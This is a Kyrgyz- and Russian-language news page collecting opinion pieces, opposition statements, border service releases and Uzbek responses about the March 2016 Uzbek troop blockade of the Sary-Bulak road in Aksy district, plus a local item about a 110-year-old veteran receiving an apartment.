Жолдошбай Осмонов, журналист

Адилет Айтикеев, журналист: "Сары-Булак такталбаган талаш жер эмес, кыргыздын жери!"

Сары-Булак такталбаган талаш жер эмес, кыргыздын жери!
Аксынын акими Медет Айдаралиев, КР Чек ара кызматынын төрагасы Райымберди Дүйшөмбиев баш болгон бир топ жетекчилер Өзбекстан басып алган Кыргызстандын жерин Чала-Сарт, Могол деп чаташтырышканы аз келгенсип, такталбаган жер деп жарыя кылып жатышат. Дагы бир жолу маалымат катары айтам, Могол деген айыл ары 15 километр ылдый тараптагы Өзбекстандын кыргыз айылы. Ал эми Чала-Сарт болсо ошол өзбектер басып алган Сары-Булактын жанындагы айыл. Чала-Сарт Өзбекстан тарабынан тартып алынган айыл болгондуктан талаштуу айыл деп эсептесек болот. Бирок Сары-Булак талаштуу эмес, кыргыздын жери. Менимче ушул жетекчилер тарабынан атайын саясат жүрүп жаткандай. Ал эми райондук администрациянын аппарат жетекчиси, айыл өкмөт башчысы, айыл башчылар болсо Сары-Булак деп атап жатат.
Чала-Сарт деген сөздү элдин башын айлантуу үчү 18-март күнү райаким Медет Айдаралиев баштады. Бул киши КСДПнын адамы. Мындан бир жыл мурда 18 жаштагы баласы райборбордогу “Газпром” май куюучу станциясынан акча карактап кармалган.
http://osh.turmush.kg/ru/news:41700
Бул иш боюнча Айдаралиев убактылуу кызматынан да четтетилген.
http://kabar.kg/rus/personnel-policy/full/53701
Эми ушул киши жөн маалымат бербей элдин башын айлантып, ар кайсыны айтып жатат. Эртең ушул жерден өзбектер көгөрүп чыкпай койсо акимдин башы оорубайт. Бирок маселенин баары кыргыз тараптын позициясынын так эместиги, малыматтардын туура эместигинен келип чыгып жатат.
Урматтуу журналисттер! Абдишарип Бекилов агабыз, дагы бир топ Аксынын тургундары кайталап айтып жатат, биринчиден, ал жерди такталбаган жер деп айтууга негиз жок. Анткени анын ылдый жагындагы кыргыздын Чала-Сарт, Могол деген айылдарын өзбектер басып алышкан. Мына ошол жерлерди талаштуу деп кыргыздар талап кылса жарашат. Ал эми азыр өзбек аскерлер турган жер кыргыздын Сары-Булак деген жери. Такталбаган эмес эле тээ өзүбүзчө автономия алган 20-жылдардан кийин эле биздики болгон. 90-жылдарда өзбек тарап талаштуу деген жерлердин жолун тосуп, бизди Сары-Булакка чейин сүрүп салган. Анан кыргыз бийлиги Сары-Булакка алгач шагыл жол куруп, кийин 2002-жылдары асфальттап жатат. Кандай түшүнбөйсүңөр, такталбаган жер деп Атамбаевдин абийирин жабыш үчүн өкмөттүн атайын адамдары ушундай сөздү таратып жатат. А чындыгында бул жер Кыргызстандын Аксы районуна караштуу Сары-Булак деген жер. Өзбекстандын аскерлери Кыргызстандын жерине басып кирип келишти. Биз маалыматты туура жеткиришибиз керек. Азыр бизди дүйнө карап турат, Эл аралык уюмдар, ООН, РФ, АКШ сыяктуу гиганттар да жөн жатпай алар байкап турушат. Эгер биз өзүбүз маалыматтык жактан уттура берсек анда эртең бул жерден да ажырап калышыбыз мүмкүн.
Дагы бир жолу айтам, биздин мамлекеттин Сары-Булак деген участкасын Өзбекстан басып кирип алды. Бул факт. Ал жер эч кандай талаш-тартышы жок Кыргызстандын жери болууга тийиш. Ооба, демаркация боло элек, бирок ал кыргыздын жери!
Адилет Айтикеев, журналист

Жолдош Орозов, Апрелчи: "Атамбаев, Сариев, Текебаевдердин мамлекет башкарууга жөндөмсүз экенин көрүп туруп кыймылдабай, аракет кылбай олтура беришибиздин өзү чыккынчылык!"

Урматтуу Кыргыз элим, дегеле кыргыз эли кайда баратабыз? Эмнени каалап жатабыз? Деградациянын жеткен чегине жеттик го.. Мындан ары эмне кылабыз? Бийлик башындагылар кыргыз элин түз эле орго салганы баратса деле карап олтура беребизби? Аксы, Лейлек жерлерибизди Өзбектер басып алса, Атамбаев Президент катары дым ооз ачпай олтуруунун кандай сыры бар? Өзү мурун айтып жүргөндөй бул Кыргыздарды түздөн-түз Кокон хандыгына басып берүү эмеспи? Коңшү кылымдан-кылымга эриш аркак жашап келе жаткан тектеш элдер менен дипломатиялык мамиле түзгөнгө жарабай аларды кас кылуунун кажети барбы? Сөздүн чынына келсек Атамбаев ким да, Ислам Каримов ким? Таразага салсак деле салмак жагынан Каримов болбой эле оордук кылып жатпайбы. Мейли, саясий бааларын салыштырбаганда да тең ата мамлекет аралык иштерди жүргүзсө болобу? Мындай иш анын кыргыз элин жекирип, ар кандай сөздү суйлөй берүүсү эмес да, бул деген мамлекеттин бүтүмдүгү, коопсуздугу жоголуп жатат деген нерсе? Кыргыз мамлекетин жок кылуу идеясын жамынгандар өз кызыкчылыгын ойлошууда ал эми, орустарга, Америкага мындайча айтканда баар бир, алардын таасиринде иш кылбай өз алдынча алга жылсак болбойбу? Бийлик башындагы саткындар итбекер кен-байлыктарыбызды, элибизди (даром) салып берип жатышса аларга майталкан эмеспи? Атамбаевдин бийликке келиши кыргыз элине эч кандай пайда алып келген жок, тескерисинче чекебизге чыккан чыйкан болду. Алар Революциянын таш-талканын чыгарып салды. Кайран гана шейит кеткен кыргыздын 100 дөн ашык курман болгон жигиттери, силер элим-жерим деп өлгөнүңөр менен Атамбаев, Текебаев, Сариев, жана башкалар элдин асыл максаттарын тетири буруп салышты. Азыр силер АША, Теке, РОЗА, Токсонго чыккан абышкадай болгон Сариев, Бакиевдин режиминде Бакиевге кызмат кылгандар бийликке толуп алышып, баш аламан башкарып жатышат, мамлекет катары жашап кетүүгө коркунуч туулду, анткени мамлекет башына жөндөмсүз адамдар келип чек арабыз, кен- байлыктарыбыз кетип жатат. Булардын жөндөмсүздүгүн көрүп туруп кыймылдабай, аракет кылбай олтура беришибиздин өзү чыккынчылыкка барабар менин бир туугандарым! коррупция деген андан да күчөдү. ӨЗГӨЧӨ Прокуратура жана сот системасы өлүп бүттү, аларга ким акча берсе ошолордун сөзүн сүйлөшөт. Кыргыздар качан таза кыргызча ата-бабаларыбыздын жолуна түшүп жашайбыз? Сөздүн чыны кыргыз мамлекети коркунучта. Эгер тез аранын ичинде эл өзүбүз чара көрбөсөк бийликтегилерден пайда жок. Демек, ойгонушубуз керек. Ойгонгула тагдырыбыз опурталдуу бир туугандарым!!!
Жолдош Орозов, Апрель революциясынын катышуучусу

“Эл үнү” оппозициялык кыймылынын билдирүүсү: Курултайдын 1-этабы 22-мартта Аксыда, 2-этабы 24-мартта Ошто өтөт

2016-жылдын 18-мартындагы Өзбекстандын аскерлери Аксы району менен Ала-Бука районунун ортосундагы Сары-Булак айлында, Лейлек районунда талаш деп эсептелген аймактардагы Кыргызстандын жолун тосуп алышты. Бул эл аралык жана Кыргызстан менен Өзбекстандын мамлекеттер аралык келишимдеринин талаптарына туура келбейт.
Тилекке каршы, бул эгемендиктин 25 жылында Өзбекстан тарабынан жасалган биринчи жолку окуя эмес. Аксы жана Ала-Бука аймактарында бир нече жолу өзбектер жол тосуп алганда, кыргыз бийликтери ал жолду таштап салып, жогору жактан жол салып, чыр чыгарышкан эмес. Акыркы беш жылда кыргыз бийлиги чек ара боюнча Өзбекстан менен жогорку деңгээлдеги сүйлөшүүлөрдү жүргүзө алган жок.
Чек ара абалы жылдан-жылга курчуп, талаш-тартыштардын айынан жарандарыбыз бөөдө өлүмгө дуушар болууда. Патриот жаш жигиттерибиз мамлекеттин бүтүндүгүнө тынчсызданып, Ак үйдүн алдына пикетке чыгышты. Аксылыктар бийлик чек араны коргобосо, өзүбүз коргойбуз деп шымаланып турушат. Алар чек араны мурда да коргоп келишкен. Эми эл өз алдынча чек арага чыкса ар кандай кокустуктар болуп кетиши мүмкүн.
Ошондуктан, Кыргыз Республикасынын Президенти, Коргоо кеңеши чек араны калыбына келтирүү боюнча жогорку деңгээлдеги саясий-дипломатиялык сүйлөшүүлөрдү тез арада баштоосу зарыл. Мындан тышкары чек арада жашаган жарандардын коопсуздугун камсыз кылуу керек.
Биз – “Эл үнү” саясий-коомдук кыймылынын түштүк регионалдык бөлүмүнүн жана Аксы районунун айрым тургундарынын өтүнүчү менен Аксы районундагы чек ара маселеси боюнча түзүлгөн кырдаалды эске алып, 24-мартта Ош шаарында өтүүчү Элдик Курултайдын 1-этабын Аксынын элине колдоо көрсөтүп 22-мартта саат 12де Кербен шаарында өткөрүүнү чечтик. Минтип жерибиз кесип алынып турганда, элим-жерим деген патриотторду биз менен бирге үн кошууга чакырабыз.
Биз, бардык Кыргызстандын жарандары сыяктуу эле, Кыргызстандын бүтүндүгүн колдоп, Өзбекстандын аскерлеринин бир тараптуу жол тосуусун айыптап, тынчсыздангандыгыбызды билдиребиз.

“Эл үнү” саясий-коомдук кыймылы
20-март 2016-жыл

ГПС КР: "На кыргызско-узбекском участке государственной границы оружие не применялось"

Отдел по связям с общественностью и СМИ Государственной пограничной службы Кыргызской Республики сообщает, что информация, распространяемая в СМИ и интернет-пространстве, о якобы имевшей место перестрелке на кыргызско-узбекском участке государственной границы в м. Чаласарт Аксыйского района Джалал-Абадской области, не соответствует действительности.
В период с 18 по 20 марта 2016 г. на кыргызско-узбекском участке государственной границы оружие НЕ ПРИМЕНЯЛОСЬ.
Ситуация полностью контролируется Государственной пограничной службой Кыргызской Республики.
Государственная пограничная служба Кыргызстана в связи с действиями узбекской стороны предприняла адекватные меры по обеспечению пограничной безопасности в м. Чаласарт Аксыйского района Джалал-Абадской области: на данном участке границы в настоящее время от Государственной пограничной службы Кыргызстана выставлены 2 БТР и спецподразделения.
Пограничные подразделения Кыргызстана, которые дислоцируются на данном участке границы, располагают достаточным количеством сил и средств для обеспечения пограничной безопасности.

ГПС КР: Ситуация на кыргызско-узбекском участке госграницы в Аксыйском районе находится под контролем

Отдел по связям с общественностью и СМИ Государственной пограничной службы Кыргызской Республики сообщает, что ситуация на кыргызско-узбекском участке государственной границы в м. Чаласарт Аксыйского района Джалал-Абадской области находится под контролем Государственной пограничной службы Кыргызской Республики и характеризуется как относительно стабильная.
На месте инцидента находится заместитель председателя ГПС КР полковник Талайбек Усубалиев, который координирует действия пограничных подразделений и других государственных органов.
Пограничные подразделения Кыргызстана осуществляют охрану данного участка кыргызско-узбекской государственной границы в усиленном режиме.
Пограничные представители Кыргызстана и Узбекистана продолжают переговорный процесс. Кыргызская сторона настаивает на выводе узбекской стороной тяжелой техники и военнослужащих с несогласованного участка границы.
Среди населения приграничной территории проводится разъяснительная работа.
Ситуация полностью контролируется Государственной пограничной службой Кыргызской Республики.

Узбекистан заявил, что территория неописанного участка принадлежит ему

Комитет по охране госграницы СНБ Узбекистана заявил, что вся бронетехника находится на территории своей страны, а охрана участков госграницы осуществляется в соответствии с двухсторонними договоренностями без заходов на неописанные участки. Об этом написал узбекский портал Podrobno.uz со ссылкой на представителя комитета.
«В связи подготовкой к празднованию «Навруз», пограничными войсками Службы национальной безопасности (СНБ) Республики Узбекистан приняты меры по усилению охраны Государственной границы, в том числе с Кыргызстаном», — говорится в статье.
Вместе с тем, 18 марта 2016 года в связи с ремонтно-восстановительными работами, пропуск через международный пункт «Маданият-автодорожный» в одностороннем порядке был приостановлен, о чем своевременно была уведомлена кыргызская сторона в установленном порядке по линии погранпредставительского аппарата, отметили в Комитете.
Комитет по охране Государственной границы СНБ Республики Узбекистан в очередной раз призывает кыргызских коллег воздержаться от распространения информации, противоречащей действительности, во избежание осложнения отношений между пограничными ведомствами сторон.
Источник: knews.kg

"Кыргыз Чоролору" чек ара жаңжалы чыккан Аксыга аттанышты

“Кыргыз чоролору” бирикмесинин лидери Замирбек Көчөрбаев бүгүн Аксыдагы кыргыз-өзбек чек арасындагы жаңжалга байланыштуу Аксыга аттанып жатышкандыктары тууралу билдирүү таратты.
Ата Журт кыйын күнгө кабылганда,
Айлансын ар бир уулуң чагылганга!

“Кечээ, 19-мартта “Кыргыз Чоролору” коомдук бирикмеси Аксы аймагындагы чек ара маселеси боюнча чечим кабыл алышып, Чүй, Бишкек “Кырк чоро” кошундары 22-мартта Аксыга бара турган болушту. Эгер 22-мартка чейин Өзбекстан куралдуу күчтөрү Кыргыз Республикасына караштуу аймактан чыгып кетишпесе Чоролор тиешелүү чараларды көрүшү мүмкүн”.
Эсиңиздерге сала кетсек, 22-мартка Аксыда чек ара маселесине байланыштуу элдик митинг жана оппозициялык Курултай өткөрүү белгиленүүдө.
Кыргыз чоролору
Кыргыз чоролору2

“Эл үнү” кыймылынын Кыргызстандын элине Кайрылуусу: "Бакиев 2005-жылдын март революциясын кандай алдап, сатып кеткендей эле, Атамбаев 2010-жылдын 7-апрель революциясын сатып, алдап кетти"

Урматтуу Кыргызстандын эли!
Президент А.Атамбаев 2002-жылдын 17-мартындагы Аксы окуясынан, 2005-жылдын 24-мартындагы, 2010-жылдын 7-апрель элдик революцияларынан сабак албай мурдагы эки качкын президенттердин авторитардык жолуна түшүп, Конституциянын жоболорун бузуу менен мамлекеттик бийлик бутактарын узурпациялап алуунун кесепетинен Кыргызстандын ички жана тышкы саясаттары баш аламан, туруксуз, элдин кызыкчылыгын көздөбөгөн, мурда болуп көрбөгөндөй кризиске дуушар болду.
Бакиев 2005-жылдын март революциясын кандай алдап, сатып кеткендей эле, Атамбаев 2010-жылдын 7-апрель революциясын сатып, алдап кетти, ага далилдер толтура:
-Атамбаевдин 5 жылдык авторитардык башкаруусунда Кыргызстандын саясий-экономикалык эгемендиги кескин чектелди. Кыргызгаз, Камбар-Ата-2 сыяктуу айрым стратегиялык объектилер бир гана Атамбаевдин каалоосу менен Россияга берилип, мурда берилген “Кумтөр”, “Жер-Үй” ж.б. кен байлыктар чыккан жерлер чет элдиктердин колунда калып, колдон-колго өтүп келүүдө;
-2010-жылдын 7-апрелинен кийин улутташтырылган объектилер, башка “майлуу-сүттүү” жерлер рейдерлик жол менен өз жакындарына жең учунан өткөрүлдү;
-Кыргыз улутунун намысын тебелетитп Батукаевди “ардактуу адам” катары узатып, ошол эле учурда нечендеген кыргыздын мекенчил уулдарына жалаа, ушактарды өзү таратып, айрымдарына кылмыш иш “токуп” сындырып, айрымдарын миллиондогон сомго айыпка кириптер кылды;
-Атамбаев Конституциянын 64-беренесин одоно бузуп өзүнө гана баш ийген жазалоочу-куугунтуктоочу орган АКСти мыйзамсыз түзүп, алар Атамбаевге таянып коррупция менен күрөшүү шылтоосу менен нечендеген таза, адилет адамдарды ак жеринен ар кандай мыйзамсыз жолдор менен каралап, ондогону зомбулукка чыдабай майып болду. Ага медакадемиядагы акыркы факты далил болот. Бул М.Садыркуловдун өлүмүнө тете иш. Нечендеген ислам динин тутунган жаштарыбыз сотсуз-сураксыз “террорист” катары атылып жатат;
-Социалдык төлөмдөр, ошол эле учурда “атаңдын пенсиясы бар”, “эски трактору бар”, “аты, машинеси бар” ж.б. шылтоолор менен жөлөк пулдар, бийик тоолуу коэффиценттер кескин чектелди. Электр энергиясынын баасы 2сом 16 тыйынга, газдын баасы 16-18 сомго чыкканын, коммуналдык төлөмдөрдүн 2-3 эсе көбөйгөнүн, элге пайдасы тийбей турган камсыздандыруу мыйзамдарынын кабыл алынгандыгын, калктын оюн эске албай ЕврАзЭСке кирүү менен “Дордой”, “Кара-Суу” ири соода түйүндөрүнүн жабылуу алдында тургандыгын, коррупциянын гүлдөп өнүгүп жатышын кошууга болот;
-Туруктуу тышкы саясаттын жоктугунан, “оозуна алы жетпегенинен” 6 жылдан бери коңшу өлкөлөр, Өзбекстан, Таджикстан менен деги эле мамиле түзө албаса, эми Россия, Турция дагы Атамбаевдин ким экенин билип, далысын салууда;
-Өлкөдө Атамбаевдин “сойкулук” саясатынан сырткы күчтөрдүн Кыргызстанга болгон “агрессиялык саясаты” ачыктан-ачык жүргүзүлүүдө, ага Аксы Лейлек райондорундагы биздин жерлерди бир тараптуу басып алуу, айрым сырткы күчтөрдүн аракеттери , ал түгүл Атамбаевдин өзүн да “чет өлкөнүн агенти” дегени далил болот;
Атамбаев өлкөнүн ичиндеги же тышкы саясаттагы өзү түзгөн проблемаларды чечкендин ордуна, өлкөгө башаламандыкты жараткысы келип, “оппозицияны таш-бараңга алгыла”, “алар канга тойбогон кузгундар”, “шайтандын кулдары”, “бузукулар” ж.б. көчөдөгү селсаяк айтпаган сөздөрдү айтып жатат. Ошондуктан 24-марттагы Элдик Курултайда провакация уюштурулуп, жанжал болуп, Президенттин бул шыкагы ишке ашса, ага Атамбаев буйрук бергени үчүн жеке күнөөлүү болуп, жооп берерин эскертип кетебиз!
Өз элин бири-бирине “ташбараң” кылдыртам деген Президенттен эч кандай пайда жок. Бул Бакиевдин “Ак үйдү автомат менен коргойм”- дегенинен да коркунучтуу чакырык. Элибиз 2002-жылдын 17-18-мартында, 2005-жылдын 4-15-24-мартында, 2010-жылдын 7-апрелинде мекендин, бийликтин чыныгы ээси ким болорун иш жүзүндө далилдешкен. Кудай колдосо, дагы далилдешет…
Урматтуу Кыргызстандын эли!
“Бектер кетет эл калат, бетеге кетет бел калат”-деген ата-бабалардан калган накыл сөз бар. Атамбаевдин “өйдүк-сөйдүк” саясатына, Жогорку Кеңештин “бычмалдыгына”, Өкмөттүн көр пенделигине карабай, Кыргызстандын бүтүндүгү, элибиздин биримдиги үчүн, келечегибиз үчүн болуп көрбөгөндөй ынтымактуулукка чакырабыз. Бүгүнкү Атамбаев түзгөн ички-тышкы кризисти биримдик, ынтымак менен жеңүүгө болот. Атамбаевдин бул провакациясына алдырбай, дүйнө элдерине дагы бир жолу үлгү болуп, тынчтык жолу менен эсирген бийликти эл үчүн иштетели, иштебесе кетирели.
Өлкөдөгү Атамбаев түзгөн кризисти да, анын өзүнүн тагдырын да чечүү үчүн 24-мартта Ош шаарында ата-бабалардын байыркы салтына ылайык өтчү Элдик Курултайда ийри олтуруп түз, ачык кеңешип, социалдык-экономикалык проблемаларды, чек ара проблемаларын чечүүнүн жолун табалы.
Өлкөнүн тагдырына кайдыгер болбогон бардык замандаштарыбызды 2016-жылдын 24-мартында саат 10до Ош шаарынын борбордук аянтына Элдик Курултайга чакырабыз!
“Эл үнү” саясий-коомдук кыймылы
20-март 2016-жыл

“Эл үнү” оппозициялык кыймылынын билдирүүсү: Курултайдын 1-этабы 22-мартта Аксыда, 2-этабы 24-мартта Ошто өтөт

2016-жылдын 18-мартындагы Өзбекстандын аскерлери Аксы району менен Ала-Бука районунун ортосундагы Сары-Булак айлында, Лейлек районунда талаш деп эсептелген аймактардагы Кыргызстандын жолун тосуп алышты. Бул эл аралык жана Кыргызстан менен Өзбекстандын мамлекеттер аралык келишимдеринин талаптарына туура келбейт.
Тилекке каршы, бул эгемендиктин 25 жылында Өзбекстан тарабынан жасалган биринчи жолку окуя эмес. Аксы жана Ала-Бука аймактарында бир нече жолу өзбектер жол тосуп алганда, кыргыз бийликтери ал жолду таштап салып, жогору жактан жол салып, чыр чыгарышкан эмес. Акыркы беш жылда кыргыз бийлиги чек ара боюнча Өзбекстан менен жогорку деңгээлдеги сүйлөшүүлөрдү жүргүзө алган жок.
Чек ара абалы жылдан-жылга курчуп, талаш-тартыштардын айынан жарандарыбыз бөөдө өлүмгө дуушар болууда. Патриот жаш жигиттерибиз мамлекеттин бүтүндүгүнө тынчсызданып, Ак үйдүн алдына пикетке чыгышты. Аксылыктар бийлик чек араны коргобосо, өзүбүз коргойбуз деп шымаланып турушат. Алар чек араны мурда да коргоп келишкен. Эми эл өз алдынча чек арага чыкса ар кандай кокустуктар болуп кетиши мүмкүн.
Ошондуктан, Кыргыз Республикасынын Президенти, Коргоо кеңеши чек араны калыбына келтирүү боюнча жогорку деңгээлдеги саясий-дипломатиялык сүйлөшүүлөрдү тез арада баштоосу зарыл. Мындан тышкары чек арада жашаган жарандардын коопсуздугун камсыз кылуу керек.
Биз – “Эл үнү” саясий-коомдук кыймылынын түштүк регионалдык бөлүмүнүн жана Аксы районунун айрым тургундарынын өтүнүчү менен Аксы районундагы чек ара маселеси боюнча түзүлгөн кырдаалды эске алып, 24-мартта Ош шаарында өтүүчү Элдик Курултайдын 1-этабын Аксынын элине колдоо көрсөтүп 22-мартта саат 12де Кербен шаарында өткөрүүнү чечтик. Минтип жерибиз кесип алынып турганда, элим-жерим деген патриотторду биз менен бирге үн кошууга чакырабыз.
Биз, бардык Кыргызстандын жарандары сыяктуу эле, Кыргызстандын бүтүндүгүн колдоп, Өзбекстандын аскерлеринин бир тараптуу жол тосуусун айыптап, тынчсыздангандыгыбызды билдиребиз.

“Эл үнү” саясий-коомдук кыймылы
20-март 2016-жыл

Фотобаян - Таш-Көмүрдүк депутаттар 110 жаштагы эмгек ардагери Саткын Айталиевага 400 миң сомго жаңы батир сатып беришти

Кечээ, 19-мартта Таш-Көмүр шаарынын тургуну, 110 жаштагы оорук жана эмгек ардагери Саткын Айталиева Таш-Көмүр шаардык кеңешинин депутаттары жана мэрия тарабынан сатылып берилген көп кабаттуу үйдүн бир бөлмөлүү батирине көчүп кирди деп маалымдады өкүлдүн басма сөз катчысы. Буга чейин көп жылдар бою Таш-Көмүр шаарында соода-сатык тармагында эмгектенген 110 жаштагы ооруктун жана эмгектин ардагери өзүнүн турак-жайы болбогондуктан убактылуу Бишкек шаарында жашап келген.
Таш-Көмүр 110 жаш2
– Ооруктун жана эмгектин ардагери Саткын Айталиева энебиз буга чейин Бишкек шаарында жашап келген. Таш-Көмүр шаардык кеңешинин депутаттары Саткын энебиздин оор шартын туура түшүнүү менен кабыл алышып, шаардын Кичи-Курулуш районундагы №9 үйдүн №1-чи батирин толук капиталдык ремонттоодон чыгарышып, 300 миң сомго бардык ыңгайлуу шарттары бар бир бөлмөлүү үйдү жана кошумча 100 миң сомдук эмеректер менен буюмдарды жергиликтүү шаардык кеңештин бюджетинен сатып берүү чечимин чыгарып беришти. Быйыл июнь айында, кудай буйруса Саткын энебиздин 110 жылдык кутман курагын тойлойбуз. Оорук жана эмгек ардагери Саткын энебиздин татыкктуу өмүрү жана даңктуу эмгек жолу өсүп келе жаткан жаштарыбызга өрнөк болууга татырлык. Бүгүн энебизди Бишкек шаарынан алып келип, жаңы батирине көчүрүп кирдик, – деди Таш-Көмүр шаарынын мэри Бекболот Миңбаев.
Таш-Көмүр 110 жаш3
Бир бөлмөлүү батирге ээ болгон ооруктун жана эмгектин ардагери Саткын Айталиеваны өкүл Жумагүл Эгембердиева куттуктап, өзүнүн белегин тартуулады. Өз кезегинде 110 жаштагы кадырман ооруктун жана эмгектин ардагери Саткын Айталиева ушундай камкордуктары үчүн шаардык кеңештин депутаттарына, жергиликтүү шаардык жана областтык бийликтин жетекчилерине чын дилинен чыккан терең энелик ыраазычылыгын билдирип, ак батасын берди. 110 жаштагы Саткын энени 58 жаштагы кызы, кесиби боюнча мээрбан Зейне асырап багууда. Саткын эне ондогон небере-чебере менен кыбыралардын сүймөнчүктүү энеси.
Учурда Таш-Көмүр шаардык кеңешинде 31 депутат иш алып барат. Мамидалы Кулдышев төрагалык кылган Таш-Көмүр шаардык кеңешинин депутаттары 90 жаштагы ооруктун жана эмгектин ардагери Маша Коңурбаевге дагы жакынкы күндөрү жер үй куруп берүү маселесин ийгиликтүү чечип берүүнүн алдында турушат. Бул туурасында Таш-Көмүр шаарынын мэри Бекболот Миңбаев билдирди.
Таш-Көмүр 110 жаш
Таш-Көмүр 110 жаш4
Жолдошбай Осмонов, журналист

Бакытбек Үмөтов, Аксынын тургуну: "2007-жылдары айыл башчы чечип койчу чек ара маселесин азыр Президент да чече албай калды"

2007-жылдары мен ушул Аксы – Ала-Бука авто жолунун чырлуу участогуна жакын жайгашкан Кара-Төбө айылынын айыл башчысы болуп иштечүмүн. Ошол кезде да Өзбекстан техникаларын солдаттарын алып келип чек араны казууга аракет жасашкан. Эң жакын жайгашкан айыл катары биз, Сөгөт айылынын айыл башчысы Замир Баназаров, “Сөгөт” чек ара заставасынын командири Улук Жоошбаев биринчилерден болуп жетип барып, Өзбекстандын өкүлдөрү менен сүйлөшүү жүргүзгөнбүз. Артыбызда 4 гана аскерибиз бар. Тигил тарапта 40 ка чукул аскер, иттери жана бир нече техникалары бар болчу. Мен командир Улук Жоошбаевдин Өзбекстан аскерлерине: “Эгер силер ушул жерге эксковатордун ковшун жерге киргизип казууга аракет кылсаңар мен на поражение силерге ок атууга милдеттүүмүн, мен силерге эскертүү бердим!” деп айтканы азырга чейин кулагыман кетпейт. Кийин эмне болду, алар бизден сурана башташты, “тигил жерден казалычы, бул жерден казалычы” деп. Ошол убакта биз жөнөкөй 120 түтүндүү айылдын айыл башчысы болчубуз. Мына ошондо өзбектер жөнөкөй айыл башчыдан сураныша турган абал бизде бар болчу. Биз, “жок, бул маселени чек ара боюнча эки өлкөнүн Паритеттик комиссиясы гана чечет” деп сүйлөшүүгө барган эмеспиз. Кийин район, областтык жетекчилер да сүйлөшүүлөрдү жүргүзүп, алар койгон вариантка барышкан эмес. Эки-үч күндөн кийин ал жер ошол бойдон бизде калган, алар аскерлерин, техникаларын кайра алып кетишкен. Азыр өзбекстан тарап жөнөкөй айыл башчы эмес Президентти да тоотушпай жатат. Бул акыбалга ким алып келгени баарыңарга түшүнүктүү болуш керек…
Бактыбек Үмөтов, Аксы районунун Кара-Төбө айылынын экс-башчысы

Токон Мамытов, КР Чек ара кызматынын экс-төрагасы: “Өзбекстан кечээ басып алган Аксыдагы жер 1938-жылдагы документтерде деле Кыргызстандыкы деп көрсөтүлгөн”

“Кечээ, 18-мартта эрте мененки саат 7.40. да Өзбекстандын аскерлери кирип бууп салган Аксы районуна караштуу Кашка-Суу айыл округунун Сары-Булак участкасы дайыма эле Кыргызстанга карап келген”, – деп билдирди КР Чек ара кызматынын экс-төрагасы Токон Мамытов журналисттерге.
“Бул участок 1938-жылы Кыргыз ССРинин Караван районунун “Бирлик” айыл чарба артелине караган. Ал эми 1951-жылдан тартып бул участок “Бирлик” айыл чарба артелинин базасында түзүлгөн ошол эле Караван районунун “Ленин жолу” айыл чарба артелине карап калган. 1960-жылдан тартып бул участок Караван районунун базасында түзүлгөн Жаңы-Жол районунун (азыркы Аксы району) Ленин атындагы колхозуна бекитилип берилген. Бул участоктун аянты 50 гектарды түзөт. Ал жерден Ала-Бука – Кербен жолунун 1,8 чакырымы өтөт. Асфальтталган жолдон башка ал участкадан 350 метрдей Кыргызстандын электр өткөргүч линиялары да өтөт. Азыр бул участка Аксы районунун Кашка-Суу айыл округунун балансында турат. Бул жерде башынан эле кыргыз жарандары жашап жана дыйканчылык кылып иштетип келишкендиктен биз ал территорияны биздики деп эсептейбиз. Албетте ага жакын жерде Кыргызстан менен Өзбекстандын чек аратилкеси өтөт жана ал тилке боюнча алигиче өз ара макулдашууга кол коюла элек. Ошондуктан ал участкага Өзбекстандын куралдуу күчтөрүнүн кирип келиши көп суроолорду жаратат. Өзбек тарап ал территорияга эмнеге негиздеп аскер техникасын киргизгенин түшүндүрүп бериши керек. Мыйзам боюнча алар ал биздин территориядагы ар бир кыймылын Кыргызстандын Чек ара кызматы менен макулдашып гана жасаш керек болчу. Кыргыз Республикасынын Тышкы иштер министрлиги менен Чек ара кызматы өзбек тараптан расмий түшүндүрмө берүүнү талап кылышы зарыл”, – деди генерал Токон Мамытов.
Эсиңиздерге сала кетсек, кечээ 18-мартта Өзбекстандын куралдуу күчтөрү Аксы районунун Сары-Булак участкасына 40-45 аскер, 2 бронетранспортер жана 2 КАМАЗ маркасындагы автомашинаны киргизип, Аксы –Ала-Бука жолун бууп салышкан.

Токон Мамытов, Экс-председатель Госпогранслужбы КР : "Заблокированный узбекскими военными участок - с 1938 года принадлежал Киргизской ССР"

Экс-председатель Государственной пограничной службы КР Токон Мамытов сообщил «Кабарлар», что заблокированный участок автодороги «Кербен – Ала-Бука» с 1938 года находился в юрисдикции Киргизской ССР.
«Нужно отметить, что с 1938 года данный участок принадлежал сельхозартели «Бирлик» Караванского района Киргизской ССР. С 1951 года данный участок принадлежал сельхозартели «Ленин-Жол» Караванского района Киргизской ССР. С 1960 года этот участок приписан колхозу им. Ленина Жаны-Жольского района (ныне Аксыйский)», – отметил Мамытов.
Мамытов отметил, что Государственная пограничная служба и Министерство иностранный дел Кыргызстана должны потребовать официальных объяснений по поводу появления военной техники на неописанном участке госграницы в местности Чала-Сарт.
По его словам, многие годы спорный участок Аксыйского района принадлежал Кыргызстану.
«Площадь данного участка составляет 50 га. Именно через эту территорию проходят автотрасса Ала-Бука – Кербен. Протяженность оспариваемой дороги на данном участке составляет около 1,8 км. Кроме этой автотрассы проходят линии электропередач Кыргызстана протяженностью примерно в 350 метров», – отметил Мамытов.
Экс-председатель службы подчеркнул, что данная территория находится на балансе Кашка-Суйского айыльного округа.
«Фактически данная территория используется гражданами КР. Здесь линия прохождения границы между Узбекистаном и Кыргызстаном не завершена. Переговорный процесс продолжается. Мы считаем, что это наша территория, ведь там живут наши граждане, которые данную территорию используют под сельскохозяйственные нужды. Появление вооруженной техники Узбекистана на этом участке вызывает много вопросов. Узбекская сторона должна объяснить на каком основании находится военная техника, согласовала ли она свои действия с Государственной пограничной службой Кыргызстана. ГПС и МИД должны потребовать от узбекской стороны официальных объяснений», – отметил он.
Напомним, что 18 марта 2016 г. в 07:40 в местности Могол Ала-Букинского района Джалал-Абадской области на неописанном участке кыргызско-узбекской государственной границы военнослужащие Республики Узбекистан выставили 2 единицы БТР и 2 «КамАЗа». Кроме того, на этой территории находятся около 35-40 военнослужащих Узбекистана.
Источник: kabarlar.org

Видео - Сары-Челек: про шкуру убитого медведя и воду из бассейна

В Международный день дикой природы, который выпадает на 3 марта, Государственное агентство охраны окружающей среды и лесного хозяйства КР совместно с Фондом охраны снежного барса и рядом других организаций премировало отличившихся егерей, отметив таким образом их нелегкую работу в борьбе с браконьерами.

Приглашенные егери рассказывали, как они ловили того или иного браконьера. Но, как выяснилось, поймать нарушителя закона лишь полдела. История внештатного сотрудника Сары-Челекского заповедника Нурболота Таштанова – тому пример.

